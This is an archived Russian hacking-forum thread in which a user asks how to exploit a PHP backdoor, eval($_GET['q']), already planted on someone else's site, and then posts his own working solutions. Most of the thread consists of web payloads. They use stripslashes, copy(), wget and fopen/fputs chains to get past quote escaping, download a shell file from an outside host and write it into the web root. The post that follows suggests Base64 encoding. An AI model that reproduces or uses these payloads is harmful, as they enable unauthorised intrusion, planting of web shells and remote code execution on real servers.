Просмотр полной версии : Помогите воспользоваться уязвимостью
LamerHacker
23.09.2010, 21:49
Есть одна уязвимость, точнее Бэкдор в одном скрипте
PHP:
eval ($_GET['q']);
Хочу залить на сайт шелл, проблема в том, что кавычки в параметрах $_GET экранизируется, поэтому ничего не выходит
LamerHacker
23.09.2010, 22:14
Пока ждал ответа мысль сама пришла в голову
Если кому интересно, то вот мой вариант
index.php?q=$_GET[q2]=stripslashes($_GET[q2]);eval($_GET[q2]);&q2=copy("http://site.ru/shell.txt","shell.php");
Code:
или
Code:
Code:
cmd=copy('http://site.ru/shell.txt','/var/www/shell.php');
Без stripslashes
Code:
Code:
cmd=copy($_REQUEST[a],$_REQUEST[b]);&a=http://site.ru/shell.txt&b=/var/www/shell.php
Через wget, curl, fetch и другие качалки
Code:
Code:
cmd=wget http://site.ru/shell.txt -O /var/www/shell.php
Ну, а если, все таки, очень хочется по извращаться
Code:
eval($_REQUEST[cmd]);
Code:
cmd=$a=fopen($_REQUEST[b],$_REQUEST[bb]);$b=fopen($_REQUEST[c],$_REQUEST[cc]);while(!feof($a)){$res=fgets($a);fputs($b,$res);}&bb=b&cc=w+&b=http://site.ru/shell.txt&c=/var/www/shell.php
Я бы ваапще использовал Base64.
Redwood, видимо, он править не имеет возможности скрипт, поэтому юзать только может eval ($_GET['q']); (то, что какой-то хацкер прописал до него)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot